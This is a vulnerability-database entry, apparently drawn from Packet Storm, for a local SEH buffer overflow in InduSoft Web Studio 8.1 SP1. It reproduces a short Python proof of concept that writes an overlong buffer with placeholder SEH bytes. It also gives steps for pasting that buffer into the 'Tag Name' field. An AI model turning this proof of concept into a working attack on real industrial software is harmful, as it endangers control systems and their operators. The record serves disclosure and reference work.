ID
VAR-E-201809-0051
TITLE
InduSoft Web Studio 8.1 SP1 Buffer Overflow
Trust: 0.5
DESCRIPTION
InduSoft Web Studio version 8.1 suffers from a buffer overflow vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | indusoft | model: | web studio sp1 | scope: | eq | version: | 8.1 | Trust: 0.5 |
EXPLOIT
# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-11
# Vendor Homepage: http://www.indusoft.com/
# Software Link: http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InduSoft_Web_Studio_8.1.py
# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
# 3.- Open IWS v8.1 InduSoft Web Studio
# 4.- Home
# 5.- Paste ClipBoard on "Tag Name"
#!/usr/bin/env python
nSEH = "\x42\x42"
SEH = "\x43\x43"
buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InduSoft_Web_Studio_8.1.txt", "w")
f.write(buffer)
f.close()
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
overflow
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | web | Trust: 0.5 |
tag: | overflow | Trust: 0.5 |
CREDITS
Luis Martinez
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 149375 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 149375 |
LAST UPDATE DATE
2022-07-27T09:18:16.446000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 149375 | date: | 2018-09-14T23:47:27 |